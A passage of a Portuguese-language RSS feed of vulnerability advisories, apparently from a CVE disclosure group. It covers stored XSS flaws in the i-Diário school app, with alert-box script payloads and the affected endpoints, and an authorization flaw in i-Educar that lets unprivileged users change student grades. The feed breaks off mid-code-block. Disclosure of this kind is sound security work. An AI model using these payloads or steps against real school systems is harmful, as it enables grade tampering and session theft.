&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/registros-de-conteudos-por-disciplina/[ID]&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8787-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-registros-de-conteudos-por-disciplinaid&amp;#34;&amp;gt;CVE-2025-8787: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/registros-de-conteudos-por-disciplina/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8787&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8787&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/registros-de-conteudos-por-disciplina/[ID]&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/registros-de-conteudos-por-disciplina/[ID]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8787/image.png&amp;#34;
	width=&amp;#34;1478&amp;#34;
	height=&amp;#34;1024&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8787/image_hu_af95e2fb9a2d3cce.png 480w, /p/cve-2025-8787/image_hu_71862e9971386bbb.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;144&amp;#34;
		data-flex-basis=&amp;#34;346px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8787.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8787.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 10 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8788</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8788/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8788/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8788-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-aula-por-areas-de-conhecimentoid&amp;#34;&amp;gt;CVE-2025-8788: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/planos-de-aula-por-areas-de-conhecimento.(ID)&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8788&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8788&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/planos-de-aula-por-areas-de-conhecimento.(ID)&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/planos-de-aula-por-areas-de-conhecimento.(ID)&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8788-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-aula-por-areas-de-conhecimentoid&amp;#34;&amp;gt;CVE-2025-8788: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/planos-de-aula-por-areas-de-conhecimento.(ID)&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8788&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8788&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/planos-de-aula-por-areas-de-conhecimento.(ID)&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/planos-de-aula-por-areas-de-conhecimento.(ID)&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros:&amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8788/image.png&amp;#34;
	width=&amp;#34;1038&amp;#34;
	height=&amp;#34;848&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8788/image_hu_9b8b7d2a254f8182.png 480w, /p/cve-2025-8788/image_hu_650bf2e02f0977a4.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;122&amp;#34;
		data-flex-basis=&amp;#34;293px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8788.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8788.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 10 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8789</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8789/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8789/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8789-broken-function-level-authorization-bfla-permite-que-usuários-não-autorizados-alterem-as-notas-dos-alunos&amp;#34;&amp;gt;CVE-2025-8789: Broken Function Level Authorization (BFLA) permite que usuários não autorizados alterem as notas dos alunos
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8789&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8789&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um endpoint de API no i-Educar 2.9.0 é vulnerável à Broken Function Level Authorization (BFLA). Um usuário não autorizado consegue modificar as notas dos alunos acessando diretamente o endpoint &amp;lt;code&amp;gt;/module/Api/Diario&amp;lt;/code&amp;gt;, ignorando os controles de permissão. Isso leva a sérios problemas de integridade, em que qualquer pessoa com acesso ao formato da API pode adulterar registros acadêmicos.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8789-broken-function-level-authorization-bfla-permite-que-usuários-não-autorizados-alterem-as-notas-dos-alunos&amp;#34;&amp;gt;CVE-2025-8789: Broken Function Level Authorization (BFLA) permite que usuários não autorizados alterem as notas dos alunos
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8789&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8789&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um endpoint de API no i-Educar 2.9.0 é vulnerável à Broken Function Level Authorization (BFLA). Um usuário não autorizado consegue modificar as notas dos alunos acessando diretamente o endpoint &amp;lt;code&amp;gt;/module/Api/Diario&amp;lt;/code&amp;gt;, ignorando os controles de permissão. Isso leva a sérios problemas de integridade, em que qualquer pessoa com acesso ao formato da API pode adulterar registros acadêmicos.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O endpoint &amp;lt;code&amp;gt;/module/Api/Diario&amp;lt;/code&amp;gt; não aplica verificações de autorização adequadas para validar se o usuário que efetuou a chamada tem o direito de alterar as notas dos alunos. Mesmo um usuário sem nenhum perfil ou permissões atribuídas pode enviar uma solicitação e alterar as notas dos alunos no sistema com sucesso. Não há validação de funções de sessão ou permissões associadas antes da execução de ações acadêmicas confidenciais.
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;1 - Criar um novo usuário sem privilégios:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8789/image.png&amp;#34;
	width=&amp;#34;1265&amp;#34;
	height=&amp;#34;845&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8789/image_hu_12fb6a5884d4c7fe.png 480w, /p/cve-2025-8789/image_hu_1cd7def43b89cd3b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;149&amp;#34;
		data-flex-basis=&amp;#34;359px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;2 - Preparar uma solicitação para o endpoint &amp;lt;code&amp;gt;/module/Api/Diario&amp;lt;/code&amp;gt; com os dados para enviar a nota de um aluno, usando o cookie de usuário com privilégios baixos e, em seguida, enviar a solicitação:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8789/image-1.png&amp;#34;
	width=&amp;#34;1907&amp;#34;
	height=&amp;#34;706&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8789/image-1_hu_4233548f4a00bb09.png 480w, /p/cve-2025-8789/image-1_hu_e6aa64e535ea83af.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;270&amp;#34;
		data-flex-basis=&amp;#34;648px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Resultado traduzido de pt-br para en:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;6
